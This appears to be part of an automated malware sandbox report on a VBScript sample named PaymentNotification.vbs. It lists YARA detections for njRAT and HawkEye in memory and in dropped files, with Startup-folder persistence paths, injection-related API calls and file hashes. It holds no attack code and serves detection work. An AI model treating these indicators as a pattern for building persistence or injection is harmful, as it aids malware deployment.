Source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC5672 NtResumeThread, 13_2_02CC5672
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC55CA NtQuerySystemInformation, 13_2_02CC55CA
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC571A NtWriteVirtualMemory, 13_2_02CC571A
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC56ED NtWriteVirtualMemory, 13_2_02CC56ED
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC5590 NtQuerySystemInformation, 13_2_02CC5590
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Code function: 1_2_00007FFD067D0ADD 1_2_00007FFD067D0ADD
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Code function: 1_2_00007FFD067D36BD 1_2_00007FFD067D36BD
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Code function: 1_2_00007FFD067D1E55 1_2_00007FFD067D1E55
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Code function: 2_2_00A82238 2_2_00A82238
Source: C:\Users\user\AppData\Roaming\servieda.exe Code function: 3_2_00007FFD067E0ADD 3_2_00007FFD067E0ADD
Source: C:\Users\user\AppData\Roaming\servieda.exe Code function: 3_2_00007FFD067E60AA 3_2_00007FFD067E60AA
Source: C:\Users\user\AppData\Roaming\servieda.exe Code function: 3_2_00007FFD067E36BD 3_2_00007FFD067E36BD
Source: C:\Users\user\AppData\Roaming\servieda.exe Code function: 3_2_00007FFD067E620C 3_2_00007FFD067E620C
Source: C:\Users\user\AppData\Roaming\servieda.exe Code function: 3_2_00007FFD067E650D 3_2_00007FFD067E650D
Source: C:\Users\user\AppData\Roaming\servieda.exe Code function: 3_2_00007FFD067E792A 3_2_00007FFD067E792A
Source: C:\Users\user\AppData\Roaming\servieda.exe Code function: 3_2_00007FFD067E61D3 3_2_00007FFD067E61D3
Source: C:\Users\user\AppData\Roaming\servieda.exe Code function: 3_2_00007FFD067E1E55 3_2_00007FFD067E1E55
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Code function: 8_2_00007FFD06800ADD 8_2_00007FFD06800ADD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Code function: 8_2_00007FFD06803985 8_2_00007FFD06803985
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Code function: 8_2_00007FFD06801E55 8_2_00007FFD06801E55
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Code function: 12_2_006E5DCA 12_2_006E5DCA
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Code function: 12_2_00F4D5E0 12_2_00F4D5E0
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Code function: 12_2_00F49530 12_2_00F49530
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Code function: 12_2_00F48C60 12_2_00F48C60
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Code function: 12_2_00F4F298 12_2_00F4F298
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Code function: 12_2_00F48918 12_2_00F48918
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008AD426 13_2_008AD426
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008BD5AE 13_2_008BD5AE
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008AD523 13_2_008AD523
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008B7646 13_2_008B7646
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008E29BE 13_2_008E29BE
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008E6AF4 13_2_008E6AF4
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_0090ABFC 13_2_0090ABFC
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_00903CBE 13_2_00903CBE
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_00903C4D 13_2_00903C4D
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_00903DC0 13_2_00903DC0
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008AED03 13_2_008AED03
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_00903D2F 13_2_00903D2F
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008ACF92 13_2_008ACF92
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008BAFA6 13_2_008BAFA6
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_0102639C 13_2_0102639C
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02C96048 13_2_02C96048
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02C95758 13_2_02C95758
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02C97C30 13_2_02C97C30
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02C97089 13_2_02C97089
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02C97098 13_2_02C97098
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02C91D9A 13_2_02C91D9A
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02C91DA8 13_2_02C91DA8
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008DC7BC 13_2_008DC7BC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_00404DDB 14_2_00404DDB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_0040BD8A 14_2_0040BD8A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_00404E4C 14_2_00404E4C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_00404EBD 14_2_00404EBD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_00404F4E 14_2_00404F4E
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Tmp.exe 2E5075A95C5663256555E292409149B4522F76FBE63BB48665213006C2D5CA2A
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\pgr.exe BFD5D84C4FED8F9D23F94FE32BB7EE415DBE632C2EBAAC642DBFDB73F89D0833
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe BFD5D84C4FED8F9D23F94FE32BB7EE415DBE632C2EBAAC642DBFDB73F89D0833
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 00411538 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: String function: 008EBA9D appears 35 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: PaymentNotification.vbs Initial sample: Strings found which are bigger than 50
Yara signature match
Source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.342778002.000001B866BB3000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.374043001.000001B866BB2000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
